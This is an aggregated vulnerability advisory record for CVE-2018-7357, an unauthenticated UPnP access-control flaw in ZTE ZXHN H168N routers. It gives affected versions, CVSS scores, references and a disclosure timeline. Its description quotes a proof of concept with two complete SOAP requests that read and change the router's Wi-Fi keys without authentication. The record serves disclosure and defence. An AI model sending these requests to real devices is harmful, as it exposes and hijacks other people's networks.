Sign-up

ID

VAR-201811-0983


CVE

CVE-2018-7357


TITLE

ZTE ZXHN H168N Vulnerabilities related to certificate and password management in products

Trust: 0.8

sources: JVNDB: JVNDB-2018-012682

DESCRIPTION

ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358) Disclaimer: [This POC is for Educational Purposes , I would Not be responsible for any misuse of the information mentioned in this blog post] [+] Unauthenticated [+] Author: Usman Saeed (usman [at] xc0re.net) [+] Protocol: UPnP [+] Affected Harware/Software: Model name: ZXHN H168N v2.2 Build Timestamp: 20171127193202 Software Version: V2.2.0_PK1.2T5 [+] Findings: 1. Unauthenticated access to WLAN password: POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 288 Connection: close Content-Type: text/xml; charset="utf-8" SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1 <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope> 2. Unauthenticated WLAN passphrase change: POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 496 Connection: close Content-Type: text/xml; charset="utf-8" SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys" <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope> [*] Solution: UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. [*] Note: There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. [+] Responsible Disclosure: Vulnerabilities identified - 20 August, 2018 Reported to ZTE - 28 August, 2018 ZTE official statement - 17 September 2018 ZTE patched the vulnerability - 12 November 2018 The operator pushed the update - 12 November 2018 CVE published - CVE- 2018-7357 and CVE-2018-7358 Public disclosure - 12 November 2018 Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Trust: 2.07

sources: NVD: CVE-2018-7357 // JVNDB: JVNDB-2018-012682 // BID: 105983 // VULHUB: VHN-137389 // PACKETSTORM: 150728

AFFECTED PRODUCTS

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk1.2t2

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk1.2t5

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk11t

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk11t7

Trust: 2.4

vendor:ztemodel:zxhn h168n 2.2.0 pk11t7scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk11tscope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t5scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t2scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t6scope:neversion: -

Trust: 0.3

sources: BID: 105983 // JVNDB: JVNDB-2018-012682 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-7357
value: HIGH

Trust: 1.0

psirt@zte.com.cn: CVE-2018-7357
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-7357
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201811-444
value: HIGH

Trust: 0.6

VULHUB: VHN-137389
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2018-7357
severity: LOW
baseScore: 3.3
vectorString: AV:A/AC:L/AU:N/C:P/I:N/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-137389
severity: LOW
baseScore: 3.3
vectorString: AV:A/AC:L/AU:N/C:P/I:N/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-7357
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

psirt@zte.com.cn: CVE-2018-7357
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.0

Trust: 1.0

sources: VULHUB: VHN-137389 // JVNDB: JVNDB-2018-012682 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357 // NVD: CVE-2018-7357

PROBLEMTYPE DATA

problemtype:CWE-306

Trust: 1.1

problemtype:CWE-255

Trust: 0.8

sources: VULHUB: VHN-137389 // JVNDB: JVNDB-2018-012682 // NVD: CVE-2018-7357

THREAT TYPE

remote or local

Trust: 0.6

sources: CNNVD: CNNVD-201811-444

TYPE

access control error

Trust: 0.6

sources: CNNVD: CNNVD-201811-444

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-012682

PATCH
title:Improper Authorization Vulnerabilities in ZTE ZXHN H168N Producturl:http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523
Trust: 0.8
title:ZTE ZXHN H168N Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86847
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2018-012682 // 
            
            
            
            CNNVD: CNNVD-201811-444

EXTERNAL IDS
db:NVDid:CVE-2018-7357
Trust: 2.9
db:ZTEid:1009523
Trust: 2.0
db:EXPLOIT-DBid:45972
Trust: 1.7
db:JVNDBid:JVNDB-2018-012682
Trust: 0.8
db:CNNVDid:CNNVD-201811-444
Trust: 0.7
db:BIDid:105983
Trust: 0.3
db:PACKETSTORMid:150728
Trust: 0.2
db:VULHUBid:VHN-137389
Trust: 0.1
db:ZTEid:1009522
Trust: 0.1
sources:
            
            
            VULHUB: VHN-137389 // 
            
            
            
            BID: 105983 // 
            
            
            
            JVNDB: JVNDB-2018-012682 // 
            
            
            
            PACKETSTORM: 150728 // 
            
            
            
            CNNVD: CNNVD-201811-444 // 
            
            
            
            NVD: CVE-2018-7357

REFERENCES
url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523
Trust: 2.0
url:https://www.exploit-db.com/exploits/45972/
Trust: 1.7
url:https://nvd.nist.gov/vuln/detail/cve-2018-7357
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7357
Trust: 0.8
url:http://www.zte.com.cn/
Trust: 0.3
url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:getsecuritykeys
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/envelope/"
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-7358
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:setsecuritykeys
Trust: 0.1
sources:
            
            
            VULHUB: VHN-137389 // 
            
            
            
            BID: 105983 // 
            
            
            
            JVNDB: JVNDB-2018-012682 // 
            
            
            
            PACKETSTORM: 150728 // 
            
            
            
            CNNVD: CNNVD-201811-444 // 
            
            
            
            NVD: CVE-2018-7357

CREDITS
Usman Saeed
Trust: 0.4
sources:
            
            
            BID: 105983 // 
            
            
            
            PACKETSTORM: 150728

SOURCES
db:VULHUBid:VHN-137389
db:BIDid:105983
db:JVNDBid:JVNDB-2018-012682
db:PACKETSTORMid:150728
db:CNNVDid:CNNVD-201811-444
db:NVDid:CVE-2018-7357

LAST UPDATE DATE
2024-11-23T22:30:10.977000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-137389date:2019-10-09T00:00:00
db:BIDid:105983date:2018-09-17T00:00:00
db:JVNDBid:JVNDB-2018-012682date:2019-02-06T00:00:00
db:CNNVDid:CNNVD-201811-444date:2019-10-17T00:00:00
db:NVDid:CVE-2018-7357date:2024-11-21T04:12:03.790

SOURCES RELEASE DATE
db:VULHUBid:VHN-137389date:2018-11-14T00:00:00
db:BIDid:105983date:2018-09-17T00:00:00
db:JVNDBid:JVNDB-2018-012682date:2019-02-06T00:00:00
db:PACKETSTORMid:150728date:2018-12-11T01:49:45
db:CNNVDid:CNNVD-201811-444date:2018-11-15T00:00:00
db:NVDid:CVE-2018-7357date:2018-11-14T15:29:02.187